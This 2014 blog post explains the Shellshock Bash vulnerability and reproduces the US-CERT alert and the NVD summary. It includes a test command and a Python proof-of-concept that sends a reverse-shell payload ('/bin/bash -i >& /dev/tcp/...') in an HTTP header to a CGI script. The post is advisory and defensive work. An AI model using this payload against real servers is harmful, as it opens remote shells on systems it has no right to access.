Shellshock (Bash bug) vulnerability – critical security vulnerability discovered in Bash (Bourne-Again Shell)

// September 25th, 2014 // Hacking and Security

Example of the Shellshock (bash bug) bash security vulnerability

If your Linux/Unix (or Apple Mac OS X) applications are running with root permissions and call on the shell, this vulnerability (called “Bash Bug” or “$hellshock”) is huge as it allows an attacker to remotely execute shell commands by attaching malicious code (i.e. using a “specially crafted attack”) into environment variables used by the OS. The flaw is present in GNU Bash versions 1.14 through 4.3 (yup, this bug’s been around for 22 years now). Basically the flaw allows the attacker to create environment variables that contain trailing code – and the code gets executed as soon as the bash shell is invoked. And yes, it’s exploitable over the network.

More specifically, when assigning a function to a variable, trailing code in the function definition will be executed. For instance, enter this command:

env x='() { :;}; echo am i vulnerable to shellshock? Sorry, but yes, you are pawned!’ bash -c “echo this is an echo test”

And hope you don’t see this:

am i vulnerable to shellshock? Sorry, but yes, you are pawned!
this is an echo test

But instead, see this:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
this is an echo test

As you can see, the bug relates to how Bash processes environment variables passed by the operation system.  Code trailing the function (the echo command in the example above) definition is erroneously executed.

Here’s another “proof of concept” snippet of code that has already been released on the Internet:

import httplib,urllib,sys

if (len(sys.argv)<4):
print “Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0]
print “Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080″ % sys.argv[0]
exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell=”() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1” % sys.argv[3]

headers = {“Content-type”: “application/x-www-form-urlencoded”,
“test”:reverse_shell }
conn.request(“GET”,sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

Lest you think to yourself, bash, bah, I never use it (huh?), I’ll remind you that bash is a common shell for evaluating and executing commands from other programs such as web servers (e.g. CGI scripts through mod_cgi and mod_cgid) and mail servers and in fact, this attack vector has already been found to be in use by an active exploit against web servers (as of 9/25/14).  If your default shell is configured as Bash, this attack can be used against network-based resources.  In addition, the attack vector can be initiated through secure shell sessions, telnet sessions, CUPS printing system, as well as (potentially) embedded devices, Android devices, etc.

NIST has rated the vulnerability as “10 out of 10” for impact and “low” for complexity.  It doesn’t get an worse than that.  The fix of course, is to patch bash and vendors are rolling out the patches now. Note that the initial patch for the vulnerability was incorrect and still allowed the attack vector (which means there are two CVE, Common Vulnerabilities and Exposures, IDs for this vulnerability).  Until you can get a good patchset for the bug, you can set another shell as the default system shell (use chsh or ypchsh commands to change the shell) and if you’re running a website, make sure you sanitize your input well.  If possible, just get away from CGI scripts that call on the shell completely – they’re old hat.  If you change your shell, remember that the syntax differs between shells so changing out the shell could introduce additional problems.

Here’s the complete CERT alert:

Systems Affected

  • GNU Bash through 4.3.
  • Linux, BSD, and UNIX distributions including but not limited to:

Overview

A critical vulnerability has been reported in the GNU Bourne Again Shell (Bash), the common command-line shell used in most Linux/UNIX operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system [1](link is external). The United States Department of Homeland Security (DHS) is releasing this Technical Alert to provide further information about the GNU Bash vulnerability.

Description

GNU Bash versions 1.14 through 4.3 contain a flaw that processes commands placed after function definitions in the added environment variable, allowing remote attackers to execute arbitrary code via a crafted environment which enables network-based exploitation. [2, 3]

Critical instances where the vulnerability may be exposed include: [4(link is external), 5(link is external)]

  • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn subshells.
  • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities.
  • Allow arbitrary commands to run on a DHCP client machine, various Daemons and SUID/privileged programs.
  • Exploit servers and other Unix and Linux devices via Web requests, secure shell, telnet sessions, or other programs that use Bash to execute scripts.

Impact

This vulnerability is classified by industry standards as “High” impact with CVSS Impact Subscore 10 and “Low” on complexity, which means it takes little skill to perform. This flaw allows attackers to provide specially crafted environment variables containing arbitrary commands that can be executed on vulnerable systems. It is especially dangerous because of the prevalent use of the Bash shell and its ability to be called by an application in numerous ways.

Solution

Patches have been released to fix this vulnerability by major Linux vendors for affected versions. Solutions for CVE-2014-6271 do not completely resolve the vulnerability. It is advised to install existing patches and pay attention for updated patches to address CVE-2014-7169.

Many UNIX-like operating systems, including Linux distributions, BSD variants, and Apple Mac OS X include Bash and are likely to be affected. Contact your vendor for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743[6].

US-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summary for CVE-2014-7169, to mitigate damage caused by the exploit.

And here’s the CVE summary for CVE-2014-7169:

Vulnerability Summary for CVE-2014-7169

Original release date: 09/24/2014
Last revised: 09/25/2014
Source: US-CERT/NIST

Overview

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

Impact

CVSS Severity (version 2.0):
CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C) (legend)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Low
Authentication: Not required to exploit
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service




« « Previous Article: Will Samsung Galaxy Note 4/Gear VR become bigger than the Internet? [UPDATED]     » » Next Article: Spike DDoS toolkit details – frightening new DDoS botnet could potentially utilize Linux, Windows, and ARM IoT devices


Leave a Reply

You must be logged in to post a comment.

%d bloggers like this: